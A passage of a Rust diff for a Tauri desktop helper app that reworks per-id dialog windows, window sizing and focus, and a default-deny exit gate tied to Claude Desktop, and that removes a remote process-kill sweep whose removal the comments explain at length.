+/// rather than `close()` so it bypasses the `CloseRequested` → frontend
+/// round-trip that could strand an empty window. The `/render` handler calls
+/// it once that render reaches *any* terminal outcome (submit, cancel,
+/// X-close, TTL, channel-drop), so a window can never outlive the dialog it
+/// was showing. Idempotent — a no-op when the window is already gone.
+pub(crate) fn destroy_dialog_window(app: &tauri::AppHandle, id: &str) {
+    if let Some(win) = app.get_webview_window(id) {
         let _ = win.destroy();
     }
-    // Matching demote for `ensure_dialog_window`'s Regular-mode promote:
-    // drop back to Accessory once the dialog is gone, unless the setup
-    // window is still up.
+    mark_dialog_teardown();
+    // Matching demote for `build_dialog_window`'s Regular-mode promote: drop
+    // back to Accessory once the last dialog is gone (ignoring the one we just
+    // destroyed, which may still be in the window list) and setup is hidden.
     #[cfg(target_os = "macos")]
-    {
-        let setup_open = app
-            .get_webview_window(SETUP_WINDOW_LABEL)
-            .and_then(|w| w.is_visible().ok())
-            .unwrap_or(false);
-        if !setup_open {
-            let _ = app.set_activation_policy(tauri::ActivationPolicy::Accessory);
-        }
-    }
+    demote_if_no_dialogs_except(app, id);
 }
 
-/// Belt-and-suspenders invariant (v0.4.46, Bug B+): a dialog window may
-/// only exist while a dialog is pending in the registry. If a window is
-/// found with an empty registry, it's a stranded empty window — destroy
-/// it. Cheap (one mutex read + a window lookup); called on app
-/// re-activation, exactly when a user would otherwise notice a leftover
-/// empty frame.
+/// Belt-and-suspenders invariant (v0.4.46, Bug B+; Step 4: per-id): a dialog
+/// window may only exist while its dialog is pending in the registry. Any
+/// dialog-labelled window whose id is no longer registered is a stranded
+/// empty window — destroy it. Called on app re-activation, exactly when a
+/// user would otherwise notice a leftover empty frame.
 ///
-/// Currently wired only to macOS `RunEvent::Reopen`; other platforms
-/// have no trigger yet (Windows surfaces the existing window via the
-/// single-instance plugin), so allow it to be unused there instead of
-/// `#[cfg]`-gating the whole fn — keeps it ready for a future Windows
-/// hook without tripping CI's `-D warnings` dead-code check.
+/// Currently wired only to macOS `RunEvent::Reopen`; other platforms have no
+/// trigger yet (Windows surfaces the existing window via the single-instance
+/// plugin), so allow it to be unused there instead of `#[cfg]`-gating the
+/// whole fn — keeps it ready for a future Windows hook without tripping CI's
+/// `-D warnings` dead-code check.
 #[cfg_attr(not(target_os = "macos"), allow(dead_code))]
 pub(crate) fn sweep_orphan_dialog_window(app: &tauri::AppHandle) {
-    let pending = app
-        .try_state::<Arc<dialog::DialogState>>()
-        .map(|s| s.stats().orphan_count)
-        .unwrap_or(0);
-    if pending == 0 && app.get_webview_window(DIALOG_WINDOW_LABEL).is_some() {
-        log::debug!("[aiui] sweep: destroying orphan dialog window (no pending dialog)");
-        destroy_dialog_window(app);
+    let Some(state) = app.try_state::<Arc<dialog::DialogState>>() else {
+        return;
+    };
+    // Collect dialog-window labels (ids) whose dialog is no longer registered.
+    let orphans: Vec<String> = app
+        .webview_windows()
+        .keys()
+        .filter(|l| is_dialog_window_label(l))
+        .filter(|l| state.get_request(l).is_none())
+        .cloned()
+        .collect();
+    for id in orphans {
+        log::debug!("[aiui] sweep: destroying orphan dialog window id={id} (no pending dialog)");
+        destroy_dialog_window(app, &id);
     }
 }
 
@@ -201,10 +311,14 @@ async fn surface_for_dialog(app: tauri::AppHandle) -> Result<(), String> {
     // The update dialog is surfaced from whichever window is alive when
     // the check fires — usually the setup window (frontend triggers it
     // from there). We just need *some* visible window to attach the OS
-    // dialog to.
-    let win = app
-        .get_webview_window(SETUP_WINDOW_LABEL)
-        .or_else(|| app.get_webview_window(DIALOG_WINDOW_LABEL));
+    // dialog to; fall back to any open dialog window (Step 4: dialog
+    // windows are labelled by id, so there's no single fixed label).
+    let win = app.get_webview_window(SETUP_WINDOW_LABEL).or_else(|| {
+        app.webview_windows()
+            .into_iter()
+            .find(|(label, _)| is_dialog_window_label(label))
+            .map(|(_, w)| w)
+    });
     if let Some(win) = win {
         let _ = win.show();
         let _ = win.set_focus();
@@ -432,6 +546,12 @@ fn open_url(url: String) -> Result<(), String> {
 /// running. Issue #72.
 #[tauri::command]
 async fn quit_app(app: tauri::AppHandle) -> Result<(), String> {
+    // Case (b): explicit uninstall. Latch the exit authority *first* so the
+    // `ExitRequested` default-deny gate honours the `app.exit(0)` below instead
+    // of vetoing it (Invariant I1).
+    if let Some(auth) = app.try_state::<Arc<lifetime::ExitAuthority>>() {
+        auth.authorize();
+    }
     let killed = housekeeping::kill_all_mcp_stdio_children();
     logging::trace(&format!(
         "quit_app: killed {killed} mcp-stdio child(ren) before exit"
@@ -449,6 +569,21 @@ async fn quit_app(app: tauri::AppHandle) -> Result<(), String> {
     Ok(())
 }
 
+/// Latch the exit authority for case (c): an update-restart driven from the
+/// frontend updater. `updater.ts` calls this immediately before
+/// `@tauri-apps/plugin-process`'s `relaunch()`, which (like `app.restart()`)
+/// fires `RunEvent::ExitRequested`. Without the latch the default-deny gate
+/// would veto the relaunch and the update would never apply (Invariant I1).
+/// The HTTP `/update` path latches the same authority directly in Rust.
+#[tauri::command]
+async fn authorize_exit_for_update(
+    exit_authority: tauri::State<'_, Arc<lifetime::ExitAuthority>>,
+) -> Result<(), String> {
+    exit_authority.authorize();
+    logging::trace("authorize_exit_for_update: exit authority latched for update-restart");
+    Ok(())
+}
+
 /// Quit + relaunch Claude Desktop so it re-reads `claude_desktop_config.json`
 /// and picks up the freshly-patched aiui MCP server entry. This is the
 /// "after-Setup nudge" the user otherwise has to figure out themselves.
@@ -696,15 +831,11 @@ async fn add_remote(
     );
     let config_ok = config_step.ok;
     results.push(config_step);
-    // Fresh add — there shouldn't be a running child yet, but a
-    // re-add (Remove + Add the same host) leaves stale ones; sweep
-    // them so the first tool call respawns clean against the new pin.
-    if matches!(config_patch, Some(setup::RemoteConfigPatch::Patched)) {
-        let sweep = setup::kill_remote_mcp_stdio(&host_alias);
-        if !sweep.ok {
-            results.push(sweep);
-        }
-    }
+    // Step 2: no version-forcing kill here. A re-add re-pins the version in
+    // ~/.claude.json; the new pin takes effect at the next natural Claude Code
+    // spawn. We never `pkill -f aiui-mcp` to force it — that crashed live
+    // sessions mid-call and hit every other session on the host.
+    let _ = config_patch;
 
     if !(token_ok && config_ok) {
         // Don't persist the host or start a tunnel for a half-failed
@@ -742,39 +873,32 @@ async fn reinstall_skill() -> Result<Vec<setup::StepResult>, String> {
     Ok(results)
 }
 
-/// On-demand resync trigger for a single registered remote — wraps
-/// the same patch-pin + kill-stale-mcp-stdio sequence that runs in
-/// the background at every aiui-app startup. Surfaced as a per-remote
-/// button in Settings so the user can re-invoke it without restarting
-/// aiui (and see the StepResult log inline if a sweep fails).
+/// On-demand resync trigger for a single registered remote — re-pins the
+/// aiui-mcp version in the remote's `~/.claude.json`. Surfaced as a per-remote
+/// button in Settings so the user can re-invoke the pin without restarting
+/// aiui (and see the StepResult log inline).
 ///
-/// Why this exists: 0.4.29's auto-resync on GUI-start is silent — if
-/// the SSH-side `pkill` fails (remote temporarily unreachable) the
-/// stale subprocess keeps running with the previous version. Without
-/// a manual trigger, the user would have to close + reopen aiui-app
-/// to retry. v0.4.34 adds the on-demand path.
+/// Step 2 change: this used to also `pkill -f aiui-mcp` on the host to force
+/// the new version onto a running session. That is gone — the kill crashed
+/// live sessions mid-call (Claude Code does not respawn a disconnected MCP)
+/// and had cross-session blast radius. The re-pin alone is the correct,
+/// session-safe action: it takes effect at the next natural spawn while any
+/// in-flight session finishes on its current version. If the user genuinely
+/// wants a running remote session on the new version *now*, the cooperative
+/// path is to end and restart that Claude Code session.
 #[tauri::command]
 async fn resync_remote(
     host_alias: String,
 ) -> Result<Vec<setup::StepResult>, String> {
     let our_version = env!("CARGO_PKG_VERSION");
-    // Re-pin in `~/.claude.json` on the remote (idempotent — if
-    // already pinned, no rewrite, returns AlreadyCurrent).
-    let (pin_step, patch) = setup::patch_claude_code_config_remote(
+    // Re-pin in `~/.claude.json` on the remote (idempotent — if already
+    // pinned, no rewrite, returns AlreadyCurrent).
+    let (pin_step, _patch) = setup::patch_claude_code_config_remote(
         &host_alias,
         None,
         our_version,
     );
-    let mut results = vec![pin_step];
-    // Sweep stale aiui-mcp children only when the pin actually
-    // changed (or unconditionally? — yes, unconditionally on
-    // user-triggered resync, because the user wouldn't click resync
-    // unless they suspect drift). On unconditional sweep: kills any
-    // running aiui-mcp regardless of pin state, which is what the
-    // user wants from a "force fresh" button.
-    let _ = patch;  // not used here, but kept for tracing
-    results.push(setup::kill_remote_mcp_stdio(&host_alias));
-    Ok(results)
+    Ok(vec![pin_step])
 }
 
 #[tauri::command]
@@ -924,96 +1048,106 @@ pub(crate) fn build_setup_window(
 /// `dialog::estimate_dialog_size`. The window is resizable, so the user
 /// can drag past these defaults — we just pick a sensible starting
 /// geometry given what the agent asked us to render.
-pub(crate) fn ensure_dialog_window(
+/// Build a fresh dialog window labelled by the dialog `id` (Step 4
+/// multi-window: one window per render, never reused — N may be open at once).
+/// It loads `dialog.html`, which reads its own window label (= id) and *pulls*
+/// the render payload via `get_dialog_spec` on mount. Promotes the app to
+/// Regular so the window fronts above Claude Desktop (in Accessory mode macOS
+/// won't bring our windows forward even with `set_focus()`);
+/// `close_window` / `destroy_dialog_window` demote back to Accessory once the
+/// last dialog is gone.
+pub(crate) fn build_dialog_window(
     app: &tauri::AppHandle,
+    id: &str,
     size: (f64, f64),
+    title: &str,
 ) -> tauri::Result<tauri::WebviewWindow> {
-    // Promote the app from Accessory to Regular for the duration of the
-    // dialog. In Accessory mode (LSUIElement-style daemon, no Dock icon)
-    // macOS won't bring our windows to the front above other apps even
-    // with `set_focus()` — the agent renders a dialog and the user
-    // doesn't see it because Claude Desktop covers it. Promoting to
-    // Regular for the dialog window restores normal front/focus
-    // behaviour; we drop back to Accessory in `close_window` once the
-    // dialog finishes so we don't permanently grow a Dock icon.
     #[cfg(target_os = "macos")]
     {
         let _ = app.set_activation_policy(tauri::ActivationPolicy::Regular);
     }
-    if let Some(win) = app.get_webview_window(DIALOG_WINDOW_LABEL) {
-        // Resize to fit the new spec before surfacing. Without this,
-        // a confirm rendered after a long form would keep the form's
-        // tall geometry (and vice versa).
-        let _ = win.set_size(tauri::LogicalSize::new(size.0, size.1));
-        let _ = win.show();
-        let _ = win.set_focus();
-        let _ = win.unminimize();
-        // Briefly mark the window always-on-top to win against any
-        // app that's grabbed focus in the meantime, then lift the
-        // flag so the user can naturally Cmd+Tab away later. 800 ms
-        // is enough for the activation to settle without leaving a
-        // sticky front-most window.
-        let _ = win.set_always_on_top(true);
-        let app_for_lift = app.clone();
-        std::thread::spawn(move || {
-            std::thread::sleep(std::time::Duration::from_millis(800));
-            if let Some(w) = app_for_lift.get_webview_window(DIALOG_WINDOW_LABEL) {
-                let _ = w.set_always_on_top(false);
+    // Clamp the requested start size to the monitor's usable area, so an
+    // agent asking for `size:"l"` (or explicit width/height) on a small
+    // screen can't open a window taller/wider than the display. Leaves a
+    // margin for the menu bar / Dock. The window stays resizable, so the
+    // user can still grow it past this if they want.
+    let size = {
+        let mut s = size;
+        if let Ok(Some(mon)) = app.primary_monitor() {
+            let sf = mon.scale_factor();
+            let phys = mon.size();
+            let avail_w = (phys.width as f64 / sf) * 0.95;
+            let avail_h = (phys.height as f64 / sf) * 0.92;
+            if avail_w > 360.0 {
+                s.0 = s.0.min(avail_w);
             }
-        });
-        return Ok(win);
-    }
-    // Window is being built fresh — its frontend listeners aren't up
-    // yet. Reset the ready flag so the render path waits for the
-    // `dialog_window_ready` signal before emitting `dialog:show`.
-    if let Some(tx) = app.try_state::<Arc<tokio::sync::watch::Sender<bool>>>() {
-        let _ = tx.inner().send(false);
-    }
-    WebviewWindowBuilder::new(
-        app,
-        DIALOG_WINDOW_LABEL,
-        WebviewUrl::App("dialog.html".into()),
-    )
-    .title("aiui")
-    // Initial size from `estimate_dialog_size` — we widen for
-    // wireframe/mermaid/table and grow vertically for long forms,
-    // clamped to (1100, 900). Resizable so the user always has the
-    // last word; min size keeps the dialog usable but prevents
-    // accidental sub-icon collapse. v0.4.40.
-    .inner_size(size.0, size.1)
-    .min_inner_size(360.0, 320.0)
-    .resizable(true)
-    .center()
-    // Native, fully-visible title bar so macOS handles window-drag
-    // for us. Tauri's `data-tauri-drag-region` HTML attribute and
-    // Chromium's `-webkit-app-region: drag` CSS are *both* unreliable
-    // on Tauri 2 + WKWebView (macOS 26): the first sometimes drops
-    // mousedown depending on z-order, the second is a Chromium-only
-    // CSS property that WKWebView doesn't honour at all. The only
-    // robust path is to let macOS run its own title-bar drag, which
-    // means a visible title bar (the previous "Overlay + hiddenTitle"
-    // setup hid the title-bar pixels but kept its drag behaviour
-    // half-broken). We accept the slightly-less-flush look in
-    // exchange for a window the user can actually move.
-    .decorations(true)
-    .disable_drag_drop_handler()
-    .visible(true)
-    .always_on_top(true)
-    .build()
-    .inspect(|_win| {
-        // Fresh dialog windows also get the same lift-after-800 ms
-        // treatment as the reused-window branch above. The
-        // always_on_top flag from the builder ensures the window
-        // appears above everything; we drop it shortly after so
-        // Cmd+Tab works normally afterwards.
-        let app_for_lift = app.clone();
-        std::thread::spawn(move || {
-            std::thread::sleep(std::time::Duration::from_millis(800));
-            if let Some(w) = app_for_lift.get_webview_window(DIALOG_WINDOW_LABEL) {
-                let _ = w.set_always_on_top(false);
+            if avail_h > 320.0 {
+                s.1 = s.1.min(avail_h);
             }
-        });
-    })
+        }
+        s
+    };
+    let id_for_lift = id.to_string();
+    WebviewWindowBuilder::new(app, id, WebviewUrl::App("dialog.html".into()))
+        // Session identity (I8) in the native title bar. Set here in Rust —
+        // the frontend `setTitle` is blocked without a `core:window:set-title`
+        // capability, so the Rust builder is the reliable place.
+        .title(title)
+        // Initial size from `estimate_dialog_size` — we widen for
+        // wireframe/mermaid/table and grow vertically for long forms,
+        // clamped to (1100, 900). Resizable so the user always has the last
+        // word; min size keeps the dialog usable. v0.4.40.
+        .inner_size(size.0, size.1)
+        .min_inner_size(360.0, 320.0)
+        .resizable(true)
+        .center()
+        // Native, fully-visible title bar so macOS handles window-drag for us
+        // (Tauri's HTML drag-region and the `-webkit-app-region` CSS are both
+        // unreliable on Tauri 2 + WKWebView). v0.4.40.
+        .decorations(true)
+        .disable_drag_drop_handler()
+        .visible(true)
+        .always_on_top(true)
+        // Focus the fresh window so macOS doesn't eat the user's FIRST click
+        // just to make it key ("first mouse" — the 2026-05-31 "have to click
+        // twice" report). The old single-reused-window path called set_focus();
+        // the per-id rewrite dropped it. Belt-and-suspenders with set_focus()
+        // in the inspect below.
+        .focused(true)
+        .build()
+        .inspect(|win| {
+            // Cascade (2026-05-31 report): offset each *additional* open dialog
+            // so stacked windows don't sit exactly on top of each other. Keyed
+            // on the count of OTHER dialog windows currently open — NOT a
+            // monotonic counter — and wrapped at 8 steps, so closing a window
+            // frees its slot, the first/only dialog always opens centered, and
+            // they never march off the bottom-right over a long session.
+            let others = app
+                .webview_windows()
+                .keys()
+                .filter(|l| is_dialog_window_label(l) && l.as_str() != id)
+                .count();
+            if others > 0 {
+                if let Ok(pos) = win.outer_position() {
+                    let sf = win.scale_factor().unwrap_or(1.0);
+                    let off = ((others % 8) as f64 * 28.0 * sf) as i32;
+                    let _ = win
+                        .set_position(tauri::PhysicalPosition::new(pos.x + off, pos.y + off));
+                }
+            }
+            // Make the window key so the user's first click lands on a control
+            // instead of being consumed to focus the window.
+            let _ = win.set_focus();
+            // Briefly always-on-top to win the focus race, then lift it so
+            // Cmd+Tab works normally afterwards.
+            let app_for_lift = app.clone();
+            std::thread::spawn(move || {
+                std::thread::sleep(std::time::Duration::from_millis(800));
+                if let Some(w) = app_for_lift.get_webview_window(&id_for_lift) {
+                    let _ = w.set_always_on_top(false);
+                }
+            });
+        })
 }
 
 /// True when no aiui window is currently visible to the user. Used by
@@ -1122,6 +1256,9 @@ pub fn run_mcp_stdio_only() {
 #[cfg_attr(mobile, tauri::mobile_entry_point)]
 pub fn run() {
     let cfg = Arc::new(config::AppConfig::load_or_init().expect("config init"));
+    lifecycle_log::record(lifecycle_log::LifecycleEvent::Startup {
+        interactive: lifetime::is_interactive_session(),
+    });
 
     // Process-lifetime advisory lock (v0.4.43). Held from the very
     // first line of run() until the process dies. Two GUIs spawned in
@@ -1174,6 +1311,12 @@ pub fn run() {
     let dialog_state = Arc::new(dialog::DialogState::new());
     let ui_acks = Arc::new(ack::AckRegistry::new());
     let lifetime_stats = Arc::new(lifetime::LifetimeStats::new());
+    // Single exit authority (Invariant I1). Latched only by the two legitimate
+    // exits not caused by the host dying — uninstall (`quit_app`) and
+    // update-restart (HTTP `/update` + the frontend updater) — and read by the
+    // `ExitRequested` default-deny gate so those, and only those,
+    // Tauri-initiated terminations are honoured while Claude Desktop is alive.
+    let exit_authority = Arc::new(lifetime::ExitAuthority::new());
     let tunnel_mgr = tunnel::TunnelManager::new(cfg.http_port);
     // Shared cell that records a fatal HTTP-server bind/serve failure (e.g.
     // port 7777 held by another process). Read by the `status` command and
@@ -1197,17 +1340,9 @@ pub fn run() {
     // it apart from `http_error` (same underlying type).
     let pending_update = Arc::new(PendingUpdate::default());
 
-    // Window-ready handshake: the dialog window's frontend signals
-    // here (via the `dialog_window_ready` Tauri command) once its
-    // listeners are wired up. The render path *waits* on this watch
-    // before emitting `dialog:show`, so a freshly-built dialog window
-    // never receives an event before its listener is registered. The
-    // 0.4.30 fix — without it, a 500 ms ack timeout could fire before
-    // the WebView even finished mounting Svelte (especially on the
-    // very first render of a session, when the window is built fresh
-    // and Vite has to load the bundle).
-    let (dialog_ready_tx, _dialog_ready_rx) = tokio::sync::watch::channel(false);
-    let dialog_ready_tx = Arc::new(dialog_ready_tx);
+    // (Step 4: the old `dialog_window_ready` watch handshake is gone — the
+    // per-id dialog window pulls its spec via `get_dialog_spec` on mount, so
+    // there's no emit to race and nothing to wait on.)
 
     let rt = tokio::runtime::Builder::new_multi_thread()
         .enable_all()
@@ -1259,16 +1394,16 @@ pub fn run() {
         .manage(dialog_state.clone())
         .manage(ui_acks.clone())
         .manage(lifetime_stats.clone())
+        .manage(exit_authority.clone())
         .manage(tunnel_mgr.clone())
         .manage(http_error.clone())
         .manage(pending_update.clone())
-        .manage(dialog_ready_tx.clone())
         .invoke_handler(tauri::generate_handler![
             dialog_submit,
             dialog_cancel,
-            dialog_received,
+            write_dialog_targets,
+            get_dialog_spec,
             ui_pong,
-            dialog_window_ready,
             close_window,
             surface_for_dialog,
             is_update_safe_to_install,
@@ -1283,6 +1418,7 @@ pub fn run() {
             restart_claude_desktop,
             uninstall_all,
             quit_app,
+            authorize_exit_for_update,
             dismiss_welcome,
             open_url
         ])
@@ -1475,13 +1611,16 @@ pub fn run() {
                                     None => "unknown",
                                 }
                             ));
-                            if matches!(patch, Some(setup::RemoteConfigPatch::Patched)) {
-                                let sweep = setup::kill_remote_mcp_stdio(&host_for_task);
-                                logging::trace(&format!(
-                                    "remote-pin: {host_for_task}: sweep {}",
-                                    if sweep.ok { "ok" } else { "failed" }
-                                ));
-                            }
+                            // Step 2 (Invariant: never kill a remote bridge to
+                            // force a version): we used to `pkill -f aiui-mcp`
+                            // here whenever the pin changed. That blunt sweep
+                            // crashed live remote sessions mid-call (Claude Code
+                            // does NOT respawn a disconnected MCP) and had
+                            // cross-session blast radius — the remote twin of
+                            // the 0.4.42 Cowork-kill. The pin alone is enough:
+                            // it takes effect at the next *natural* spawn (next
+                            // Claude Code session), while any live session keeps
+                            // its current version until it ends on its own.
                         } else {
                             logging::trace(&format!(
                                 "remote-pin: {host_for_task} sync failed: {} ({})",
@@ -1568,138 +1707,116 @@ pub fn run() {
             Ok(())
         })
         .on_window_event(|window, event| {
-            // Multi-window lifecycle (v0.4.25, revised v0.4.36):
+            // Multi-window lifecycle (v0.4.25, revised v0.4.36, Invariant I2):
             //
-            // The setup window and the dialog window are independent.
-            // Closing one shouldn't kill the other — and definitely
-            // shouldn't kill the GUI process while the lifetime
-            // socket still has attached MCP-stdio children depending
-            // on it.
+            // The setup window and the dialog window are independent, and
+            // closing a window is never a process exit — the host lives with
+            // its Wirt (Claude Desktop), not with any window.
             //
-            //  • Red X on setup window: setup goes away. If no other
-            //    window is visible AND no MCP-stdio children are
-            //    attached, the app quits and `mcp_attach`'s
-            //    auto-resurrect path brings it back on the next tool
-            //    call. As long as a child is attached, we stay alive
-            //    headless — the lifetime grace timer (60s after the
-            //    last child detaches) is the only legitimate
-            //    "nobody needs aiui anymore" signal.
-            //  • Red X on dialog window: the dialog is treated as
-            //    cancelled (the frontend's CloseRequested-listener
-            //    fires `dialog_cancel` first; this branch runs after).
-            //    NEVER quits the app, regardless of any-visible state.
-            //    The dialog window is per-call ephemeral — destroyed
-            //    after every submit/cancel by `close_window`. Quitting
-            //    the GUI here would tear down the HTTP server while
-            //    the agent's tool call is still parsing the response,
-            //    producing the 8s `wait_for_aiui` timeouts the user
-            //    saw on 2026-05-04 (trace 16:11:42.197 "GUI is gone"
-            //    20 ms after a successful form submit).
-            if let tauri::WindowEvent::CloseRequested { .. } = event {
+            //  • Red X on setup window: hide it + demote to Accessory (no Dock
+            //    icon). The host stays alive headless; it is brought back to a
+            //    visible Settings window via Dock-click / `open` (the Reopen
+            //    handler) or the single-instance plugin. No exit here — the
+            //    process only ends when the watcher sees the Wirt gone or an
+            //    uninstall/update latches the exit authority.
+            //  • Red X on dialog window: the dialog is treated as cancelled
+            //    (the frontend's CloseRequested-listener fires `dialog_cancel`
+            //    first; this branch runs after). NEVER quits the app. The
+            //    dialog window is per-call ephemeral — destroyed after every
+            //    submit/cancel by `close_window`. Quitting the GUI here would
+            //    tear down the HTTP server while the agent's tool call is still
+            //    parsing the response, producing the 8s `wait_for_aiui`
+            //    timeouts the user saw on 2026-05-04 (trace 16:11:42.197 "GUI
+            //    is gone" 20 ms after a successful form submit).
+            if let tauri::WindowEvent::CloseRequested { api, .. } = event {
                 let app = window.app_handle();
                 let closed_label = window.label().to_string();
-                if closed_label == DIALOG_WINDOW_LABEL {
-                    // User closed the dialog window with the native X (or
-                    // ⌘W). Resolve any in-flight `/render` as cancelled
-                    // right here in Rust — we no longer depend on a
-                    // frontend CloseRequested handler, which in 0.4.45
-                    // could `preventDefault()` and then fail to complete
-                    // the close, stranding an empty, unclosable window
-                    // (Bug B, the 2026-05-29 overnight report). We do NOT
-                    // prevent the close: the window is allowed to go away.
-                    // The awaiting `/render` will run its end-of-handler
-                    // `destroy_dialog_window` (a no-op by then).
+                if is_dialog_window_label(&closed_label) {
+                    // User closed THIS dialog window with the native X (or
+                    // ⌘W). Multi-window (Step 4): the window label is the
+                    // dialog id, so cancel exactly that dialog — never the
+                    // others that may be open for parallel sessions. Resolve
+                    // it as cancelled right here in Rust (we no longer depend
+                    // on a frontend CloseRequested handler, which in 0.4.45
+                    // could `preventDefault()` then fail to complete the
+                    // close, stranding an empty window — Bug B). We do NOT
+                    // prevent the close; the awaiting `/render` runs its
+                    // end-of-handler `destroy_dialog_window` (a no-op by then).
                     if let Some(ds) = app.try_state::<Arc<dialog::DialogState>>() {
-                        let n = ds.cancel_all("window_closed");
-                        if n > 0 {
-                            log::debug!(
-                                "[aiui] dialog window X-closed — cancelled {n} pending dialog(s)"
-                            );
-                        }
+                        ds.cancel(&closed_label);
                     }
+                    // Mark the teardown so a Reopen fired as a side-effect of
+                    // this close doesn't surface the settings window.
+                    mark_dialog_teardown();
                     log::debug!(
-                        "[aiui] dialog window closed — staying alive for further tool calls"
+                        "[aiui] dialog window {closed_label} X-closed — cancelled its dialog, host stays alive"
                     );
                     return;
                 }
-                // Setup window: quit only if nothing else needs us.
-                let app_for_check = app.clone();
-                let _ = app.run_on_main_thread(move || {
-                    let any_visible = app_for_check
-                        .webview_windows()
-                        .iter()
-                        .any(|(label, w)| {
-                            label.as_str() != closed_label
-                                && w.is_visible().unwrap_or(false)
-                        });
-                    let attached = app_for_check
-                        .try_state::<Arc<lifetime::LifetimeStats>>()
-                        .map(|s| s.child_count())
-                        .unwrap_or(0);
-                    if !any_visible && attached == 0 {
-                        log::info!(
-                            "[aiui] setup window closed and no MCP-stdio children attached — quitting; auto-resurrect will bring us back on next tool call"
-                        );
-                        let port = app_for_check
-                            .try_state::<Arc<config::AppConfig>>()
-                            .map(|c| c.http_port)
-                            .unwrap_or(7777);
-                        housekeeping::pre_exit_cleanup(port, "setup-close-no-children");
-                        app_for_check.exit(0);
-                    } else {
-                        log::debug!(
-                            "[aiui] setup window closed, staying alive (visible_others={any_visible}, attached_children={attached})"
-                        );
-                    }
-                });
+                // Setup window: Invariant I2 — window close is NOT process
+                // exit. Hide the window and demote back to Accessory (no Dock
+                // icon) so aiui keeps living headless with its host (Claude
+                // Desktop), serving the lifetime socket + HTTP for local and
+                // remote dialogs. The process only ends when its Wirt quits
+                // (the watcher) or on an explicit uninstall/update — never
+                // because a user dismissed a window. The old
+                // `setup-close-no-children → app.exit(0)` path (which decided
+                // "nobody needs us" from the child count + window visibility,
+                // both proxies) is removed.
+                api.prevent_close();
+                let _ = window.hide();
+                #[cfg(target_os = "macos")]
+                {
+                    let _ = app.set_activation_policy(tauri::ActivationPolicy::Accessory);
+                }
+                lifecycle_log::record(lifecycle_log::LifecycleEvent::WindowHidden);
+                log::debug!(
+                    "[aiui] setup window close → hidden + demoted to Accessory (host stays alive; I2)"
+                );
             }
         })
         .build(tauri::generate_context!())
         .expect("error building tauri application")
         .run(|app, event| {
-            // ExitRequested handler (v0.4.43 introduced cleanup; v0.4.44
-            // adds the veto for the "headless mode" case). Tauri fires
-            // ExitRequested on Cmd-Q, on ⌘W of the last visible
+            // ExitRequested gate — single exit authority (Invariant I1). Tauri
+            // fires ExitRequested on ⌘Q, on ⌘W / close of the last visible
             // window, on OS shutdown, and on `.restart()`. The
-            // last-window-close case is the dangerous one: as soon as
-            // the agent's dialog window closes after a submit, Tauri
-            // wants to terminate the process — but that's wrong while
-            // the GUI is meant to live headless serving the lifetime
-            // socket. v0.4.42 lost the GUI ~18 ms after every Dialog
-            // submit through this path (trace 2026-05-26 17:00:28.181
-            // → 17:00:28.199); the dialog-window-close branch of
-            // on_window_event already returned without exit, but
-            // Tauri's default ExitRequested handler ran *after* it
-            // and killed the process anyway.
+            // last-window-close case is the dangerous one: as soon as the
+            // agent's dialog window closes after a submit, Tauri wants to
+            // terminate the process — but the host is meant to live headless
+            // serving the lifetime socket + HTTP. v0.4.42 lost the GUI ~18 ms
+            // after every dialog submit through exactly this path (trace
+            // 2026-05-26 17:00:28.181 → 17:00:28.199).
             //
-            // Resolution rule:
-            //   • Anyone still depending on us — an attached
-            //     mcp-stdio child or a pending dialog — ⇒ veto the
-            //     exit via `api.prevent_exit()`. The lifetime-grace
-            //     timer (60 s after the last child detaches) remains
-            //     the *only* legitimate "everyone's gone, really
-            //     exit" signal in normal operation.
-            //   • Nobody attached and no pending dialog ⇒ honour the
-            //     exit, but run pre_exit_cleanup first so any ssh-NTR
-            //     tunnel children get SIGTERM instead of becoming
-            //     launchd orphans.
-            if let tauri::RunEvent::ExitRequested { api, code, .. } = &event {
-                let attached = app
-                    .try_state::<Arc<lifetime::LifetimeStats>>()
-                    .map(|s| s.child_count())
-                    .unwrap_or(0);
-                let pending_dialogs = app
-                    .try_state::<Arc<dialog::DialogState>>()
-                    .map(|s| s.stats().orphan_count)
-                    .unwrap_or(0);
-
-                if code.is_none() && (attached > 0 || pending_dialogs > 0) {
-                    // Tauri-initiated quit (no explicit exit code).
-                    // Someone still needs us — keep the process alive.
+            // The decision no longer reads child count or window visibility —
+            // both were proxies that the 0.4.43–0.4.45 patches kept getting
+            // wrong. It is `host_should_exit(explicit, cd_running)`: honour the
+            // exit only when an uninstall/update latched `ExitAuthority`, or
+            // the Wirt (Claude Desktop) is already gone; otherwise default-deny
+            // via `api.prevent_exit()`. The watcher owns the CD-gone exit in
+            // normal operation; this gate is the backstop for every other
+            // Tauri-initiated termination.
+            if let tauri::RunEvent::ExitRequested { api, .. } = &event {
+                // Default-deny (Invariant I1). The only legitimate planned
+                // exits are: (b) uninstall / (c) update-restart — both latch
+                // `ExitAuthority` before asking Tauri to terminate — or (a) the
+                // Wirt (Claude Desktop) is already gone. Every other
+                // Tauri-initiated exit (last-window-close, ⌘Q, OS quit-all) is
+                // vetoed. This is what stops the headless host dying ~18 ms
+                // after a dialog submit (v0.4.42) and on overnight churn
+                // (v0.4.45): the child count and window visibility no longer
+                // enter the decision at all.
+                let explicit = app
+                    .try_state::<Arc<lifetime::ExitAuthority>>()
+                    .map(|a| a.is_authorized())
+                    .unwrap_or(false);
+                let cd_running = setup::is_claude_desktop_running();
+                if !lifetime::host_should_exit(explicit, cd_running) {
                     logging::trace(&format!(
-                        "[aiui] veto tauri-exit-requested: attached_children={attached}, \
-                         pending_dialogs={pending_dialogs}"
+                        "[aiui] veto ExitRequested (default-deny): explicit={explicit}, \
+                         claude_desktop_running={cd_running}"
                     ));
+                    lifecycle_log::record(lifecycle_log::LifecycleEvent::ExitDenied);
                     api.prevent_exit();
                     return;
                 }
@@ -1708,11 +1825,20 @@ pub fn run() {
                     .try_state::<Arc<config::AppConfig>>()
                     .map(|cfg| cfg.http_port)
                     .unwrap_or(7777);
-                let reason = if code.is_some() {
-                    "tauri-exit-requested-explicit"
+                let reason = if explicit {
+                    "exit-authorized-uninstall-or-update"
                 } else {
-                    "tauri-exit-requested-no-attached"
+                    "exit-claude-desktop-gone"
                 };
+                lifecycle_log::transition(lifecycle_log::Phase::Exiting);
+                lifecycle_log::record(lifecycle_log::LifecycleEvent::HostExit { reason });
+                // Forensic dump of the lifetime event ring on the way out —
+                // the post-hoc record that was missing during the 0.4.x
+                // instability (#137 cross-cutting).
+                for line in lifecycle_log::recent() {
+                    logging::trace(&format!("[aiui] lifecycle-dump {line}"));
+                }
